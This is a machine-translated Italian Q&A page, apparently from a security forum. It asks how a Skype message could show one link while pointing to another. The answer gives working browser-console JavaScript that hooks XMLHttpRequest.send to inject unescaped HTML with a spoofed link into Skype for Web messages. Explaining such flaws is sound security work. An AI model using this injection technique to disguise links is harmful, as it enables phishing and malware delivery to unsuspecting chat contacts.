Inserisci link nascosto in Skype [chiuso]

Naviga le tue risposte
3

Recentemente ho ricevuto un link da uno dei miei contatti Skype (infetto da un virus informatico).

Il link sembra un Instagram, ma punta a un altro sito. Come l'ha attaccato l'aggressore? Come creare un messaggio simile?

Schermata del messaggio Skype (versione 7.7 (335)) su Mac:

Aggiornamento:

Alcune persone pensano che questa domanda non sia correlata alla sicurezza. Ma non sono d'accordo.

Questo è un comportamento insolito di Skype. Gli utenti Skype si aspettano che il testo del link sia sempre uguale al link target. I link modificati possono essere utilizzati per inviare messaggi di spam, distribuzione di malware e de-anonimizzazione degli utenti.

    
posta Yahor 07.07.2015 - 12:43
fonte

1 risposta

10

Attualmente c'è una piccola violazione nel Skype per il Web . Qualsiasi codice HTML è sfuggito sul lato client prima di essere pubblicato sul server Skype. Ma puoi inviare codice HTML senza escape scrivendo codice JavaScript.

I passaggi seguono:

  1. Vai a Skype per il Web tramite Chrome

  2. Apri la console JavaScript ed esegui: 

    // replace standard XHR.send() with our custom implementation
XMLHttpRequest.prototype.oldSend = XMLHttpRequest.prototype.send;
var newSend = function(args) {
    try {
        // messages to the server are posted via JSON
        // in 'content' field
        var m = JSON.parse(args);
        if (m.content && m.content.indexOf('secret') === 0) { // 'secret' is our codeword
            // if the message begins with 'secret', replace it by our HTML with the link
            m.content = '<a tabindex="-1" target="_blank" href="http://security.stackexchange.com/questions/93305/insert-hidden-link-in-skype">http://watch-yourself.com</a>';
            this.oldSend(JSON.stringify(m));
        } else {
            // if no 'content' field or no 'secret' codeword, then send as is
            this.oldSend(args);
        }
    } catch (x) {
        // if not JSON, then send as is
        this.oldSend(args);
    }
}
XMLHttpRequest.prototype.send = newSend;

  3. Scrivi "segreto" in qualsiasi messaggio di chat

  4. Il messaggio risultante mostrato nella versione desktop di Skype:

    
risposta data 08.07.2015 - 17:36
fonte

Leggi altre domande sui tag

URL del sito Web per indirizzare gli utenti a "fare un punto" sulla sicurezza [chiuso] La radice di un sistema può accedere a dati non criptati quando si utilizza un doppio tunnel?